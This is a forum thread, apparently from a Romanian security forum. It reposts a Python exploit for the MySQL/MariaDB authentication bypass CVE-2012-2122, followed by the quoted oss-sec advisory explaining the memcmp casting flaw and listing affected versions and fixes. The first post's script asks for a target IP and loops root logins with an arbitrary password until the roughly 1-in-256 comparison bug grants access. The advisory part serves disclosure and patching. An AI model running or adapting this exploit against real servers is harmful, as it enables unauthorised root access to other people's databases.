Jump to content
The_Arhitect

MySQL Remote Root Authentication Bypass

Recommended Posts

Posted

MySQL Remote Root Authentication Bypass

#!/usr/bin/python
#
#
# This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little.
#
# Title: MySQL Remote Root Authentication Bypass
# Written by: Dave Kennedy (ReL1K)
# http://www.secmaniac.com
#
# Original advisory here: seclists.org/oss-sec/2012/q2/493
import subprocess

ipaddr = raw_input("Enter the IP address of the mysql server: ")

while 1:
subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()

Sursa: MySQL Remote Root Authentication Bypass

Posted

Nici mie nu prea mi-a venit a crede insa mai jos este explicatia (sursa: oss-sec: Security vulnerability in MySQL/MariaDB sql/password.c specificata si in articol/exploit)


All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are
vulnerable.
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

This issue got assigned an id CVE-2012-2122.

Here's the issue. When a user connects to MariaDB/MySQL, a token (SHA
over a password and a random scramble string) is calculated and compared
with the expected value. Because of incorrect casting, it might've
happened that the token and the expected value were considered equal,
even if the memcmp() returned a non-zero value. In this case
MySQL/MariaDB would think that the password is correct, even while it is
not. Because the protocol uses random strings, the probability of
hitting this bug is about 1/256.

Which means, if one knows a user name to connect (and "root" almost
always exists), she can connect using *any* password by repeating
connection attempts. ~300 attempts takes only a fraction of second, so
basically account password protection is as good as nonexistent.
Any client will do, there's no need for a special libmysqlclient library.

But practically it's better than it looks - many MySQL/MariaDB builds
are not affected by this bug.

Whether a particular build of MySQL or MariaDB is vulnerable, depends on
how and where it was built. A prerequisite is a memcmp() that can return
an arbitrary integer (outside of -128..127 range). To my knowledge gcc
builtin memcmp is safe, BSD libc memcmp is safe. Linux glibc
sse-optimized memcmp is not safe, but gcc usually uses the inlined
builtin version.

As far as I know, official vendor MySQL and MariaDB binaries are not
vulnerable.

Regards,
Sergei Golubchik
MariaDB Security Coordinator

References:

MariaDB bug report: [URL]https://mariadb.atlassian.net/browse/MDEV-212[/URL]
MariaDB fix: [URL="http://bazaar.launchpad.net/%7Emaria-captains/maria/5.1/revision/3144"]http://bazaar.launchpad.net/~maria-captains/maria/5.1/revision/3144[/URL]

MySQL bug report: [URL="http://bugs.mysql.com/bug.php?id=64884"]MySQL Bugs: #64884: logins with incorrect password are allowed[/URL]
MySQL fix: [URL="http://bazaar.launchpad.net/%7Emysql/mysql-server/5.1/revision/3560.10.17"]http://bazaar.launchpad.net/~mysql/mysql-server/5.1/revision/3560.10.17[/URL]
MySQL changelog:
[URL="http://dev.mysql.com/doc/refman/5.1/en/news-5-1-63.html"]MySQL :: MySQL 5.1 Reference Manual :: D.1.2 Changes in MySQL 5.1.63 (07 May 2012)[/URL]
[URL="http://dev.mysql.com/doc/refman/5.5/en/news-5-5-24.html"]MySQL :: MySQL 5.5 Reference Manual :: D.1.3 Changes in MySQL 5.5.24 (07 May 2012)[/URL]

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...